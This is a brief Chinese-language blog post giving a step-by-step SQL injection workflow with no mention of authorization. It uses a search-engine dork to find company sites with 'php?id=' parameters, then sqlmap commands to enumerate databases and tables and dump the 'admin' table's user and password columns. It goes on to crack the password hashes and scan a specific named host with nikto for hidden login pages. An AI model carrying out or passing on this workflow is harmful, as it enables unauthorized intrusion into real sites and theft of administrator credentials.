SQLmap
2018-10-23 本文已影响0人
慕止
可以Google或者百度搜索
公司 inurl:php?id=
//初始注入
sqlmap -u 链接地址 --dbs --current-user
基本都是用字典来查找

//寻找数据库的表
sqlmap -u --dbms mysql -D 你要查找的表名 --tables
输入10个线程
如果找不到表名可以使用
sqlmap -u --dbms mysql --tables
//查找指定的表(找的表如:admin)
sqlmap -u 链接 --dbms mysql -T admin --columns
//如找到字段有user,pwd就可以使用:
sqlmap -u 链接 --dbms mysql -T admin -C user,pwd --dump
破解哈希密码

选择1,使用自带字典慢慢查找。
如果找不到登录入口,可以使用nikto来查找隐藏的目录
nikto -host www.825.st.wsy010.cn
